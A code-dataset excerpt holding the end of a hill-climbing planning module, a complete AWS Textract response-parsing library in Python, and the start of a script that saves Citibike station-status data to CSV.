Individual(action_sequence)\n individual.fitness, individual.age = 0, 0 # reset across generations\n return individual\n\n def _select_best_individual(self, current_elite, mutated_individual, simulated_environment):\n self._evaluate_individual(mutated_individual, simulated_environment)\n elite = mutated_individual if mutated_individual.fitness > current_elite.fitness else current_elite\n self._append_elite(elite)\n return elite\n\n def _shift_buffer(self, environment, individual):\n individual.action_sequence.pop(0)\n individual.action_sequence.append(environment.sample())\n return individual\n\n def _rollout(self, environment, latent, hidden, is_parallel=True):\n total_reward = 0\n if is_parallel:\n with ThreadPoolExecutor() as executor:\n rollout_futures = [executor.submit(lambda args: self._single_rollout(*args), [environment, latent, hidden]) for _ in range(self.max_rollouts)]\n total_reward += sum([rollout_future.result() for rollout_future in as_completed(rollout_futures)])\n else:\n total_reward += sum([self._single_rollout(environment, latent, hidden) for _ in range(self.max_rollouts)])\n\n return total_reward / self.max_rollouts\n\n def _single_rollout(self, environment, latent, hidden):\n is_done = False\n total_reward = 0\n rollout_step = 0\n rollout_latent = latent\n rollout_hidden = hidden\n\n while not is_done and rollout_step < self.rollout_length:\n action = environment.sample()\n rollout_latent, reward, is_done, rollout_hidden = environment.step(action, rollout_hidden, rollout_latent,\n is_simulation_real_environment=False)\n total_reward += reward\n rollout_step += 1\n return total_reward\n\n def _mutate(self, environment, current_elite, generation):\n individual = copy.deepcopy(current_elite)\n self.mutation_operator(environment, individual)\n individual.age, individual.fitness = generation + 1, 0\n return individual\n\n def _evaluate_individual(self, individual, environment):\n with torch.no_grad():\n is_done = False\n total_reward = 0\n latent = self.latent\n hidden = self.hidden\n\n for action in individual.action_sequence:\n if not is_done:\n latent, reward, is_done, hidden = environment.step(action, hidden, latent, is_simulation_real_environment=False)\n total_reward += reward\n else:\n break\n\n if self.is_rollout and not is_done:\n total_reward += self._rollout(environment, latent, hidden, self.is_parallel_rollouts)\n individual.fitness += total_reward\n\n def _append_elite(self, individual):\n is_new_elite = len(self.elite_history) is 0 or individual.age is not self.current_elite.age\n self.elite_history.append((individual.fitness, is_new_elite, individual.action_sequence))\n","sub_path":"planning/simulation/random_mutation_hill_climbing_simulation.py","file_name":"random_mutation_hill_climbing_simulation.py","file_ext":"py","file_size_in_byte":5730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"463876610","text":"# Blocks is built upon list\nfrom collections import UserList,UserDict\nimport json\nimport re\nfrom functools import reduce\nfrom itertools import compress\n\ndef is_iterable(obj):\n \"\"\"\n Check if a object is iterable\n \"\"\"\n try:\n iter(obj)\n except Exception:\n return False\n else:\n return True\n\ndef clean_text(text):\n \"\"\"\n Clean text:\n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n \"\"\"\n text = re.sub('\\s+', ' ', text)\n text = re.sub('[^A-Za-z0-9 ]+', '', text)\n return(text.strip())\n\ndef get_xy(p):\n try:\n x = p[0]\n y = p[1]\n except KeyError:\n x = p[\"X\"]\n y = p[\"Y\"]\n return(x,y)\n\nclass Block(UserDict):\n def __init__(self,d):\n super().__init__(d)\n self.parsed = None\n self.parse_error = False\n self.parse_error_message = None\n\n def __repr__(self):\n string = self.__class__.__name__ + \"(\" + self.data.__repr__() + \")\"\n return(string)\n\n @property\n def parsed_text(self):\n if self.parsed:\n return(str(self.parsed))\n else:\n return(None)\n \n @property\n def width(self):\n return(self.get([\"Geometry\",\"BoundingBox\",\"Width\"]))\n\n @property \n def height(self):\n return(self.get([\"Geometry\",\"BoundingBox\",\"Height\"]))\n\n\n def get(self,key,default=None):\n \"\"\"\n Get value using key(s) defined in args.\n key: key or a list of key.\n default: default value when key is not found\n \"\"\"\n if is_iterable(key) and type(key) != str:\n v = self.data.copy()\n for k in key:\n v = v.get(k)\n if v is None:\n return(default)\n return(v)\n else:\n return(self.data.get(key))\n\n def _get_relationship_ids(self,blocks,relationship):\n if relationship == \"CHILD\":\n # case1: no relationship\n if self.get([\"Relationships\"]) is None:\n ret = []\n message = None\n return((ret,message))\n children = [x for x in self.get([\"Relationships\"]) \\\n if x[\"Type\"] == \"CHILD\"]\n # case2: no CHILD as key\n if len(children) == 0:\n ret = []\n message = \"Block has zero CHILD in Relationships\"\n return((ret,message))\n # get ids\n children_ids = children[0].get(\"Ids\")\n # case3: length of children is 0\n if children_ids is None:\n ret = []\n message = \"Block doesn't have CHILD Ids\"\n return((ret,message))\n return((children_ids,None))\n elif relationship == \"VALUE\":\n key = [x for x in self.get([\"Relationships\"]) if x[\"Type\"] == \"VALUE\"][0]\n key_ids = key.get(\"Ids\")\n if key_ids:\n return((key_ids,None))\n else:\n message = \"VALUE not found in Relationships\"\n return(([],message))\n else:\n raise ValueError(f\"Relationship {relationship} is not valid.\")\n\n def _get_text_by_relationship(self,blocks,relationship):\n # works for CELL, KEY_VALUE_SET\n if not self.get(\"BlockType\") in [\"CELL\",\"KEY_VALUE_SET\"]:\n raise ValueError(\n f\"Error at Block: {self['Id']} \"\n \"This method only works for CELL and KEY_VALUE_SET.\"\n )\n children_ids,message = self._get_relationship_ids(blocks,relationship)\n if message:\n self.parse_error = True\n self.parse_error_message = message\n if len(children_ids) == 0:\n return(\" \")\n parsed = []\n for cid in children_ids:\n child_block = blocks.filter_by(\"Id\",cid)\n if len(child_block) == 0:\n raise ValueError(f\"Could not find CHILD Id:{cid}\")\n child_block = child_block[0]\n if child_block.parsed is None:\n child_block.parse(blocks)\n parsed.append(child_block.parsed)\n return(\" \".join(parsed)) \n\n def parse(self,blocks):\n \"\"\"\n parse this block with blocks. Blocks is needed because Block's children \n are ids of other blocks. self.parsed atribute will be available \n after block is parsed\n\n Parameters:\n blocks: Blocks object\n\n How .parsed is stored:\n WORD: stored as str\n LINE: stored as str\n KEY_VALUE_SET:\n - KEY: stored as dictionary: {key:value}\n - VALUE: stored as str\n SELECTION_ELEMENT: stored as str: SELECTED or NOT_SELECTED\n CELL: stored as str\n TABLE: stored as array(list of list) of text\n PAGE: will always store \" \" as parsed.\n\n \"\"\"\n # skip if block is already parsed\n if self.parsed:\n return(self)\n block_type = self.get(\"BlockType\") \n if block_type in [\"LINE\",\"WORD\"]:\n self.parsed = self.get(\"Text\")\n return(self)\n elif block_type == \"SELECTION_ELEMENT\":\n self.parsed = self.get(\"SelectionStatus\")\n return(self)\n elif block_type == \"KEY_VALUE_SET\":\n if self.get(\"EntityTypes\")[0] == \"VALUE\":\n self.parsed = self._get_text_by_relationship(blocks,\"CHILD\")\n return(self)\n elif self.get(\"EntityTypes\")[0] == \"KEY\":\n # get key text\n key_text = self._get_text_by_relationship(blocks,\"CHILD\")\n value_text = self._get_text_by_relationship(blocks,\"VALUE\")\n self.parsed = {key_text:value_text}\n return(self) \n else:\n raise ValueError(f\"unexpected Error for Block:{self.get('Id')}\")\n elif block_type == \"CELL\":\n self.parsed = self._get_text_by_relationship(blocks,\"CHILD\")\n return(self)\n elif block_type == \"TABLE\":\n import copy\n cell_ids,message = self._get_relationship_ids(blocks,\"CHILD\")\n if message:\n self.parse_error = True\n self.parse_error_message = message\n cells = []\n for cell_id in cell_ids:\n cell = blocks.filter_by(\"Id\",cell_id)[0]\n cell.parsed = cell._get_text_by_relationship(blocks,\"CHILD\")\n cells.append(cell)\n # construct empty array, which will be filled later\n max_row = max([x[\"RowIndex\"] + x[\"RowSpan\"] - 1 for x in cells])\n max_col = max([x[\"ColumnIndex\"] + x[\"ColumnSpan\"] - 1 for x in cells])\n array = []\n row = [\"\"] * max_col\n for _ in range(max_row):\n array.append(copy.deepcopy(row))\n \n for c in cells:\n for rownum in range(c[\"RowSpan\"]):\n for colnum in range(c[\"ColumnSpan\"]):\n final_row_index = c[\"RowIndex\"]+rownum-1\n final_col_index = c[\"ColumnIndex\"]+colnum-1\n array[final_row_index][final_col_index] = c.parsed\n self.parsed = array\n return(self)\n elif block_type == \"PAGE\":\n self.parsed = \" \"\n return(self)\n\n # positions\n def point(self,position,otype = tuple):\n \"\"\"\n Get coordinate of a point from the Block.\n\n Parameters:\n position: position for the point in block. reference following:\n top left-------top-----top right \n | | |\n left-------center-----right\n | | |\n bottom left---bottom---bottom right\n or\n 0---1---2\n | | |\n 3---4---5\n | | |\n 6---7---8\n otype: output type:list,tuple or dictionary.\n \n Return:\n coordinate of a point.\n \"\"\"\n if position in [0,\"top left\"]:\n ret = self.get([\"Geometry\",\"Polygon\"])[0]\n elif position in [1,\"top\"]:\n p1 = self.get([\"Geometry\",\"Polygon\"])[0]\n p2 = self.get([\"Geometry\",\"Polygon\"])[1]\n ret = {k:(v+p2[k])/2 for k,v in p1.items()}\n elif position in [2,\"top right\"]:\n ret = self.get([\"Geometry\",\"Polygon\"])[1]\n elif position in [3,\"left\"]:\n p1 = self.get([\"Geometry\",\"Polygon\"])[0]\n p2 = self.get([\"Geometry\",\"Polygon\"])[3]\n ret = {k:(v+p2[k])/2 for k,v in p1.items()}\n elif position in [4,\"center\"]:\n p1 = self.get([\"Geometry\",\"Polygon\"])[0]\n p2 = self.get([\"Geometry\",\"Polygon\"])[2]\n ret = {k:(v+p2[k])/2 for k,v in p1.items()}\n elif position in [5,\"right\"]:\n p1 = self.get([\"Geometry\",\"Polygon\"])[1]\n p2 = self.get([\"Geometry\",\"Polygon\"])[2]\n ret = {k:(v+p2[k])/2 for k,v in p1.items()}\n elif position in [6,\"bottom left\"]:\n ret = self.get([\"Geometry\",\"Polygon\"])[3]\n elif position in [7,\"bottom\"]:\n p1 = self.get([\"Geometry\",\"Polygon\"])[2]\n p2 = self.get([\"Geometry\",\"Polygon\"])[3]\n ret = {k:(v+p2[k])/2 for k,v in p1.items()}\n elif position in [8,\"bottom right\"]:\n ret = self.get([\"Geometry\",\"Polygon\"])[2]\n else:\n raise ValueError(f\"Position: {position} is not valid.\")\n\n if otype == dict:\n return(ret)\n elif otype == list:\n return([ret[\"X\"],ret[\"Y\"]])\n elif otype == tuple:\n return((ret[\"X\"],ret[\"Y\"]))\n else:\n raise ValueError(f\"otype {str(otype)} is not valid\")\n\n def get_distance(self,point,shortest=True,dtype=\"d\"):\n \"\"\"\n Get distance from the point to this block.\n\n Parameters:\n point:\n dtype: distance type. d: euclidean distance, v: vertical distance, \n h: horizontal distance. h,v: positive if block is oh right,bottom of \n the point. negative if block is on left,top of the point.\n shortest: whether it's shortest distance or distance to center of the \n other block\n \n Return:\n float. Could have negative sign if dtype is d or v.\n \"\"\"\n import math\n # check input\n if dtype not in [\"v\",\"h\",\"d\"]:\n raise ValueError(f\"dtype :{dtype} is not one of d,h or v\")\n # get x,y coordinate of the point\n x,y = get_xy(point)\n \n if shortest:\n top_left = self.point(\"top left\")\n bottom_right = self.point(\"bottom right\")\n dx = max(top_left[0] - x,0,x-bottom_right[0])\n dy = max(top_left[1] - y,0,y - bottom_right[1])\n if dtype == \"d\":\n return(math.sqrt(sum([dx**2,dy**2])))\n elif dtype == \"h\":\n if top_left[0] < x:\n return(-1 * dx)\n else:\n return(dx)\n elif dtype == \"v\":\n if top_left[1] < y:\n return(-1 * dy)\n else:\n return(dy) \n else:\n x0,y0 = self.point(\"center\")\n if dtype == \"d\":\n return(math.sqrt(sum([(x0-x)**2 + (y0-y)**2])))\n elif dtype == \"h\":\n return(x0-x)\n elif dtype == \"v\":\n return(y0-y)\n\n def is_in_radius(self,point,radius):\n \"\"\"\n Check if center of this block is in circle defined by point and radius.\n\n Parameters:\n point:(x,y) or {\"X\":x,\"Y\":y}, center of the circle\n radius: radius of the circle\n\n Return:\n True or False\n \"\"\"\n x,y = get_xy(point)\n x0,y0 = self.point(\"center\")\n if ((x0-x)**2 + (y0-y)**2) <= radius ** 2:\n return(True)\n else:\n return(False)\n\n\n def is_in_rectangle(self,x_min,y_min,x_max,y_max):\n \"\"\"\n Check whether the center of this block is an rectangle.\n\n Parameters:\n block: Block object\n x_min: x coordinate of top left corner of the rectangle\n y_min: y coordinate of top left corner of the rectangle\n x_max: x coordinate of top bottom right of the rectangle\n y_max: y coordinate of top bottom right of the rectangle\n\n Return:\n True or False\n \"\"\"\n x,y = self.point(\"center\")\n x_in = (x >= x_min) and (x <= x_max)\n y_in = (y >= y_min) and (y <= y_max)\n return(x_in and y_in)\n\n # search text\n def _str_process(self,text,ignore_case=True,clean=False):\n \"\"\"\n Process parsed text and text.\n\n Parameters:\n text: text to compare\n ignore_case: case sensitive or not\n clean: whether to clean text. \n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n \n Return:\n tuple of self.parsed_text and text\n \"\"\"\n if self.parsed:\n parsed_text = self.parsed_text\n else:\n raise ValueError(f\"Block {self['Id']} is not parsed\")\n\n if ignore_case:\n parsed_text = parsed_text.upper() \n text = text.upper() \n\n if clean:\n parsed_text = clean_text(parsed_text)\n text = clean_text(text)\n return(parsed_text,text)\n\n def str_equals(self,text,ignore_case=True,clean=False):\n \"\"\"\n Check is text in current block is identical to text.\n\n Parameters:\n text: text to compare\n ignore_case: case sensitive or not\n clean: whether to clean text. \n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n \n Return:\n True or False\n \"\"\"\n parsed_text,text = self._str_process(text,ignore_case,clean)\n return(parsed_text == text)\n def str_contains(self,text,ignore_case = True,clean=False):\n \"\"\"\n Check whether current block contains text\n\n Parameters:\n text: text to compare\n ignore_case: case sensitive or not\n clean: whether to clean text. \n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n \n Return:\n True or False\n \"\"\"\n parsed_text,text = self._str_process(text,ignore_case,clean)\n return(text in parsed_text)\n\n def str_matches(self,regex,ignore_case=True,clean=False):\n \"\"\"\n Check whether current block partially matches regular expression. Uses \n re.search under the hood.\n\n Parameters:\n text: text to compare\n ignore_case: case sensitive or not. True raises re.IGNORECASE flag\n clean: whether to clean text in this block. Only works on self.parsed\n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n Return:\n True or False\n \"\"\"\n # line below may look strange, it's because process regex doesn't make \n # sense\n parsed_text,_ = self._str_process(\"\",ignore_case=False,clean=clean)\n if ignore_case:\n return(bool(re.search(regex,parsed_text,flags=re.IGNORECASE)))\n else:\n return(bool(re.search(regex,parsed_text)))\n\n def str_dist(self,text,fun,ignore_case=True,clean=False):\n \"\"\"\n Calculate string distance/similarity with text in current block and text.\n\n Parameters:\n text: text to compare\n fun: function in textdistance module\n ignore_case: case sensitive or not. True raises re.IGNORECASE flag\n clean: whether to clean text in this block. Only works on self.parsed\n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n Return:\n Distance or Similarity as defined in textdistance module\n \"\"\"\n if \"textdistance\" not in fun.__module__:\n raise ValueError(\n f\"Function {fun.__name__} is not from textdistance module.\"\n )\n parsed_text,text = self._str_process(text,ignore_case,clean)\n return(fun(parsed_text,text))\n\n # display matched content nicely\n def image(self,source=None,outline=\"red\",image_size=None):\n \"\"\"\n Highlight this block in source document using PIL\n\n Parameters:\n source: path to image,or PIL Image object.f source = None: show \n highlight in blank plot.\n color: border color of highlighted block\n image_size: image size in pixels (width,height). If image_size = None:\n use default width and height\n\n Return:\n PIL Image Object\n \"\"\"\n from PIL import Image,ImageDraw\n if source is None:\n if image_size is None:\n width, height = 500,500\n else:\n width,height = image_size\n image = Image.new('RGB', (width, height))\n else:\n if type(source) == str:\n image = Image.open(source)\n else:\n image = source\n if image_size is None:\n width, height = image.size\n else:\n width, height = image_size\n image = image.resize(image_size) # resize image\n\n # draw rectangle\n draw = ImageDraw.Draw((image))\n top_left = self.point(\"top left\",dict)\n bottom_right = self.point(\"bottom right\",dict)\n draw.rectangle(\n (\n (top_left[\"X\"] * width,top_left[\"Y\"] * height),\n (bottom_right[\"X\"] * width,bottom_right[\"Y\"] * height)\n ), \n outline =outline\n )\n return(image)\n\n def image_show(self,source=None,outline=\"red\",image_size=None):\n \"\"\"\n Highlight and show this block in source document using PIL.\n\n Parameters:\n source: path to image,or PIL Image object.f source = None: show \n highlight in blank plot.\n color: border color of highlighted block\n image_size: image size in pixels (width,height). If image_size = None:\n use default width and height\n \"\"\"\n image = self.image(source=source,outline=outline,image_size=image_size)\n image.show()\n\n def image_save(self,path,source=None,outline=\"red\",image_size=None):\n \"\"\"\n Highlight this block in source document using PIL, save image to given \n path.\n\n Parameters:\n path: path to save file to.\n source: path to image,or PIL Image object.f source = None: show \n highlight in blank plot.\n color: border color of highlighted block\n image_size: image size in pixels (width,height). If image_size = None:\n use default width and height\n \"\"\"\n image = self.image(source=source,outline=outline,image_size=image_size)\n image.save(path) \n\n\nclass Blocks(UserList):\n def __init__(self, l):\n super().__init__([x if isinstance(x,Block) else Block(x) for x in l])\n self._summary = self._generate_summary()\n\n @property\n def length(self):\n \"\"\"\n Length of Blocks\n \"\"\"\n return(self.__len__())\n \n def _generate_summary(self):\n summary = {}\n count = 0\n for b in self:\n if b[\"BlockType\"] not in summary:\n summary[b[\"BlockType\"]] = 1\n else:\n summary[b[\"BlockType\"]] += 1\n count += 1\n summary[\"LENGTH\"] = count\n return(summary)\n\n def __repr__(self):\n string = self.__class__.__name__ + \"(\" + self.data.__repr__() + \")\"\n return(string)\n\n def __str__(self):\n string = self.__class__.__name__ + \": \" + self._summary.__str__()\n return(string)\n\n \n @staticmethod\n def from_file(path):\n \"\"\"\n Read blocks from JSON file.\n \"\"\"\n with open(path,\"r\") as f:\n d = json.load(f)\n return(Blocks(d[\"Blocks\"]))\n\n @staticmethod \n def from_list(l):\n \"\"\"\n Initialize Blocks from a list of Block objects.\n \"\"\"\n return(Blocks(l))\n \n def map(self,fun):\n \"\"\"\n Apply function to object. Returns a list.\n \"\"\"\n return(list(map(fun,self)))\n \n def get(self,key):\n \"\"\"\n Get Attribute by key. key can be str or list/tuple\n \"\"\"\n return(self.map(lambda x:x.get(key)))\n\n def compress(self,selectors):\n \"\"\"\n Compress Blocks with selectors(list of booleans)\n \"\"\"\n return(Blocks(compress(self,selectors)))\n\n def filter(self,fun):\n \"\"\"\n Filter Blocks with function. Returns Blocks.\n \"\"\"\n return(Blocks(filter(fun,self)))\n\n def filter_by(self,key,value):\n \"\"\"\n filter Blocks by key-value pair in dictionary.\n\n key: str or list of keys for nested key.\n value: str or list\n\n Return:\n Blocks object\n \"\"\"\n return(self.filter(lambda x: x.get(key) == value))\n\n def reduce(self,fun):\n \"\"\"\n Reduce Blocks with function. Does not accept initializer\n \"\"\"\n return(reduce(fun,self))\n\n # parsing logic\n def parse(self,blocks=None):\n \"\"\"\n Parse each block in this Blocks object.\n\n Parameters:\n blocks: blocks to use when parsing. Default to None, which uses this \n Blocks object to parse each block. When blocks is provided, use that\n instead.\n\n Return:\n self\n \"\"\"\n blocks = blocks if blocks else self\n for b in blocks:\n b.parse(blocks)\n return(self)\n\n def is_parsed(self):\n \"\"\"\n Whether all items in this Blocks are parsed\n \"\"\"\n for b in self:\n if not b.parsed:\n return(False)\n return(True)\n \n @property\n def parsed(self):\n return(self.map(lambda x:x.parsed))\n\n @property\n def parsed_text(self):\n return(self.map(lambda x:x.parsed_text))\n\n # string functions\n def str_equals(self,text,ignore_case=True,clean=False):\n \"\"\"\n Check is text in current block is identical to text.\n\n Parameters:\n text: text to compare\n ignore_case: case sensitive or not\n clean: whether to clean text. \n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n \n Return:\n list of booleans\n \"\"\"\n ret = self.map(lambda x:x.str_equals(text,ignore_case,clean))\n return(ret)\n\n def filter_str_equals(self,text,ignore_case=True,clean=False):\n ret = self.compress(self.str_equals(text,ignore_case,clean))\n return(ret)\n\n def str_contains(self,text,ignore_case = True,clean=False):\n \"\"\"\n Check whether current block contains text\n\n Parameters:\n text: text to compare\n ignore_case: case sensitive or not\n clean: whether to clean text. \n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n \n Return:\n list of booleans\n \"\"\"\n ret = self.map(lambda x:x.str_contains(text,ignore_case,clean))\n return(ret)\n\n def filter_str_contains(self,text,ignore_case=True,clean=False):\n ret = self.compress(self.str_contains(text,ignore_case,clean))\n return(ret)\n\n def str_matches(self,regex,ignore_case=True,clean=False):\n \"\"\"\n Check whether current block partially matches regular expression. Uses \n re.search under the hood.\n\n Parameters:\n text: text to compare\n ignore_case: case sensitive or not. True raises re.IGNORECASE flag\n clean: whether to clean text in this block. Only works on self.parsed\n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n Return:\n list of booleans\n \"\"\"\n # line below may look strange, it's because process regex doesn't make \n # sense\n ret = self.map(lambda x:x.str_matches(regex,ignore_case,clean))\n return(ret)\n\n def filter_str_matches(self,regex,ignore_case=True,clean=False):\n ret = self.compress(self.str_matches(regex,ignore_case,clean))\n return(ret)\n\n def str_dist(self,text,fun,ignore_case=True,clean=False):\n \"\"\"\n Calculate string distance/similarity with text in current block and text.\n\n Parameters:\n text: text to compare\n fun: function in textdistance module\n ignore_case: case sensitive or not. True raises re.IGNORECASE flag\n clean: whether to clean text in this block. Only works on self.parsed\n 1. Collapse all whitespaces\n 2. Get only characters and digits and space\n 3. strip whitespaces\n Return:\n List of Distance or Similarity as defined in textdistance module\n \"\"\"\n ret = self.map(lambda x:x.str_dist(text,fun,ignore_case,clean))\n return(ret)\n\n # functions to filter by position\n def get_distance(self,point,shortest=True,dtype=\"d\"):\n \"\"\"\n Get distance from the point to each block in Blocks.\n\n Parameters:\n point: point of reference\n shortest: whether it's shortest distance or distance to center of the \n other block\n dtype: distance type. d: euclidean distance, v: vertical distance, \n h: horizontal distance. h,v: positive if block is oh right,bottom of \n the point. negative if block is on left,top of the point.\n \n Return:\n list of float number. Could have negative sign if dtype is d or v.\n \"\"\"\n ret = self.map(lambda x: x.get_distance(point,shortest,dtype))\n return(ret)\n\n def filter_by_radius(self,point,radius):\n \"\"\"\n Filter Block objects whose center is in circle defined by point and \n radius.\n\n Parameters:\n point:(x,y) or {\"X\":x,\"Y\":y}, center of the circle\n radius: radius of the circle\n\n Return:\n Blocks\n \"\"\"\n ret = self.filter(lambda x: x.is_in_radius(point,radius))\n return(ret)\n\n\n def filter_by_rectangle(self,x_min,y_min,x_max,y_max):\n \"\"\"\n Filter Block objects whose center is in rectangle defined x_min,y_min,\n x_max,y_max\n\n Parameters:\n block: Block object\n x_min: x coordinate of top left corner of the rectangle\n y_min: y coordinate of top left corner of the rectangle\n x_max: x coordinate of top bottom right of the rectangle\n y_max: y coordinate of top bottom right of the rectangle\n\n Return:\n Blocks\n \"\"\"\n ret = self.filter(lambda x:x.is_in_rectangle(x_min,y_min,x_max,y_max))\n return(ret)\n\n # find blocks by positions\n\n def find_near(self,block,distance=None,sign=None,shortest=True,dtype=\"d\"):\n \"\"\"\n Find Block objects near the given block.\n\n Parameters:\n block: Block or block id\n shortest: whether it's shortest distance or distance to center of the \n other block\n distance: positive number. Used to find block objects within distance.\n sign: None, \"-\" or \"+\". When using dtype = h or v. the distance could be \n positive or negative. sign can used to filter blocks onr top/left, \n right/bottom\n dtype: distance type. d: euclidean distance, v: vertical distance, \n h: horizontal distance. h,v: positive if block is oh right,bottom of \n the point. negative if block is on left,top of the point.\n\n Details:\n When not providing distance but specifying sign, it can find blocks on \n top/left/bottom/right of the given block.\n\n Return:\n Blocks\n \"\"\"\n try:\n center = block.point(\"center\")\n bid = block[\"Id\"]\n except AttributeError:\n center = self.filter_by(\"Id\",block)[0].point(\"center\")\n bid = block\n \n distance = distance if distance else 2 # bigger than 1.414\n \n distances = self.get_distance(center,shortest=shortest,dtype=dtype)\n\n if dtype == \"d\":\n ret = self.compress([d <= distance and d > 0 for d in distances])\n else:\n if sign is None:\n ret = self.compress([abs(d) <= distance for d in distances])\n elif sign == \"+\":\n ret = self.compress(\n [d <= distance and d > 0 for d in distances]\n )\n elif sign == \"-\":\n ret = self.compress(\n [abs(d) <= distance and d < 0 for d in distances]\n )\n else: \n raise ValueError(f\"sign must be '+','-' or None, not {sign}\")\n ret = ret.filter(lambda x: x[\"Id\"] != bid)\n return(ret)\n\n def find_between(self,block1,block2):\n \"\"\"\n Find Block objects whose center fall between block1 and block2. Between \n means the center falls into the outer rectangle generated by min and \n max points.\n ------------------------\n |-------- |\n ||min | |\n || | ----------|\n |-------- | || \n | | max||\n | ----------|\n ------------------------\n\n Parameters:\n block1,block2: Block object or Id of Block Object\n\n Return:\n Blocks\n \"\"\"\n # get all four points\n try:\n p1 = block1.point(\"top left\")\n p2 = block1.point(\"bottom right\")\n p3 = block2.point(\"top left\")\n p4 = block2.point(\"bottom right\")\n bid1 = block1[\"Id\"]\n bid2 = block2[\"Id\"]\n except AttributeError:\n p1 = self.filter_by(\"Id\",block1)[0].point(\"top left\")\n p2 = self.filter_by(\"Id\",block1)[0].point(\"bottom right\")\n p3 = self.filter_by(\"Id\",block2)[0].point(\"top left\")\n p4 = self.filter_by(\"Id\",block2)[0].point(\"bottom right\")\n bid1 = block1\n bid2 = block2\n points = [p1,p2,p3,p4]\n x_min = min([p[0] for p in points])\n y_min = min([p[1] for p in points])\n x_max = max([p[0] for p in points])\n y_max = max([p[1] for p in points])\n\n ret = self.filter_by_rectangle(x_min=x_min,y_min=y_min,x_max=x_max,\n y_max=y_max)\n ret = ret.filter(lambda x: x[\"Id\"] not in [bid1,bid2]) \n return(ret)\n\n # sort blocks\n def sorted(self,origin = (0,0),shortest = True,dtype=\"d\",reverse=False):\n \"\"\"\n sort blocks by distance to origin. Blocks are always sorted by absolute \n distance regardless of sign.\n\n Parameters:\n origin: Block or a point of reference, default to (0,0) top left corner \n of page. if origin is Block, center of the Block is used as origin\n shortest: whether it's shortest distance or distance to center of the \n other block\n dtype: distance type. d: euclidean distance, v: vertical distance, \n h: horizontal distance. h,v: positive if block is oh right,bottom of \n the point. negative if block is on left,top of the point.\n reverse: sort ascendingly or not\n\n Return:\n Blocks\n \"\"\"\n if isinstance(origin,Block):\n origin = origin.point(\"center\")\n distances = self.get_distance(origin,shortest=shortest,dtype=dtype)\n else:\n distances = self.get_distance(origin,shortest=shortest,dtype=dtype)\n distances = [abs(d) for d in distances]\n s = [x for x,y in sorted(zip(self,distances), key=lambda pair: pair[1])]\n if reverse:\n s.reverse()\n return(Blocks(s))\n\n # find block parent(s)\n def find_parent(self,block):\n \"\"\"\n Find the first parent of block. Returns Block object.\n \"\"\"\n try:\n block_id = block[\"Id\"]\n except Exception:\n block_id = block\n for b in self:\n child_ids = b._get_relationship_ids(self,\"CHILD\")[0]\n if block_id in child_ids:\n return(b)\n return(None)\n\n def find_parents(self,block):\n \"\"\"\n Find all parents of the block. Returns Blocks object.\n \"\"\"\n try:\n block_id = block[\"Id\"]\n except Exception:\n block_id = block\n ret = []\n for b in self:\n child_ids = b._get_relationship_ids(self,\"CHILD\")[0]\n if block_id in child_ids:\n ret.append(b)\n return(Blocks(ret))\n\n # image\n def image(self,source=None,outline=\"red\",image_size=None):\n \"\"\"\n Highlight Blocks in source document using PIL\n\n Parameters:\n source: path to image,or PIL Image object.f source = None: show \n highlight in blank plot.\n color: border color of highlighted block\n image_size: image size in pixels (width,height). If image_size = None:\n use default width and height\n\n Return:\n PIL Image object\n \"\"\"\n ret = None\n for b in self:\n if b.get(\"BlockType\") == \"PAGE\":\n print(\"PAGE Block is not highlighted\")\n continue\n else:\n if ret is None:\n ret = b.image(source,outline,image_size)\n else:\n ret = b.image(ret,outline,image_size)\n return(ret)\n\n def image_show(self,source=None,outline=\"red\",image_size=None):\n \"\"\"\n Highlight and show Blocks in source document using PIL\n\n Parameters:\n source: path to image,or PIL Image object.f source = None: show \n highlight in blank plot.\n color: border color of highlighted block\n image_size: image size in pixels (width,height). If image_size = None:\n use default width and height\n \"\"\"\n image = self.image(source,outline,image_size)\n image.show()\n\n def image_save(self,path,source=None,outline=\"red\",image_size=None):\n \"\"\"\n Highlight Blocks in source document using PIL and save image to path\n\n Parameters:\n path: path to save image to.\n source: path to image,or PIL Image object.f source = None: show \n highlight in blank plot.\n color: border color of highlighted block\n image_size: image size in pixels (width,height). If image_size = None:\n use default width and height\n \"\"\"\n image = self.image(source,outline,image_size)\n image.save(path)\n","sub_path":"pyUtility/aws/textract.py","file_name":"textract.py","file_ext":"py","file_size_in_byte":35143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"63484531","text":"#!/usr/bin/env python\n\n# To Add:\n# - write data to S3 bucket\n# - Write a log file\n\n\n\n# import libraries\nimport requests\nimport pandas as pd\nimport sqlite3\n\n# url for data on station status:\nstation_url = 'https://gbfs.citibikenyc.com/gbfs/en/station_status.json'\n\n# get json from API\nr = requests.get(station_url)\ndat = r.json() # returns dictionary\n\n# make dataframe of station data\ndf=pd.DataFrame( dat['data']['stations'] )\n\n# write raw data to csv so we can always go back later if needed\n#csv_name = '/Users/Andy/Springboard_DataScience/Capstone_1/data/feeds/' + str(pd.to_datetime(dat['last_updated'],unit='s')) + '.csv'\ncsv_name = '/Users/Andy/Projects/NYC_citibike/data/feeds/' + str(pd.to_datetime(dat['last_updated'],unit='s')) + '.csv'\ndf.to_csv(csv_name,index=False)\n\n# write the raw csv file to S3 also\n#import boto3\n#s3 = boto3.resource('s3')\n#fname = csv_name\n#key_name = 'station_status/' + str(pd.to_datetime(dat['last_updated'],unit='s')) + '.csv'\n#data = open(fname, 'rb')\n#s3.Bucket('citibikefeed').put_object(Key=key_name, Body=data)\n\n# add timestamp to rows (this is in UTC)\n# note each station also has a 'last updated'?\ntimestamp_utc = pd.to_datetime(dat['last_updated'],unit='s',utc=True)\n#timestamp_utc = pd.to_datetime(df['last_updated'],unit='s',utc=True)\n\ndf['timestamp_utc'] = timestamp_utc.to_datetime64()\n#df['timestamp_utc'] = pd.to_datetime(df['timestamp_utc'] 